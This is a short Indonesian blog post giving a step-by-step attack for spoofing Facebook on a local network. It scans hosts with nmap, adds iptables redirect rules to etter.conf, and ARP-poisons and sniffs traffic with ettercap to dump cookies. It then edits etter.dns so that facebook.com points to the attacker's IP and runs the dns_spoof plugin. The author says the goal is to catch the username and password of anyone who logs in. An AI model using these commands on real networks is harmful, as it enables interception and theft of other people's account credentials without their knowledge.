Tuesday, January 8, 2013

spoofing facebook via ettercap


Pertama kita scan host dulu

nmap -sn -n 192.168.1.1/24 ===>scan host

seting /etc/etter.conf
## tambahkan komen ini di file di atas ##
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Dump traffic pada ARP ( sniffing – dump cookies https )

Command : ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //

Kemudian config jalur yang akan di spoof nantinya yang di konfigurasikan pada file etter.dns. Lokasi file etter.dns secara default pada backtrack V R1

etter.dns berada di /usr/local/share/ettercap/etter.dns atau /usr/share/ettercap/etter.dns

facebook.com A 192.168.1.6 ===> ip attacker
*.facebook.com A 192.168.1.6
www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are not allowed

Edit ip address dengan ip address pengganti , dalam hal ini saya menggunakan ip address yang di gunakan os backtrack yaitu 192.168.1.6, dan hasilnya  akan mengarahkan domain facebook.com dan www.facebook.com ke ip address 192.168.1.6
Syntax ettercap dengan plugin dns_spoof

kemudian jalankan dengan perintah
ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //

hihi semoga berhasil :D

moga-moga ada yang login , ntar ketahuan tuh user and passwordnya
Load disqus comments

0 comments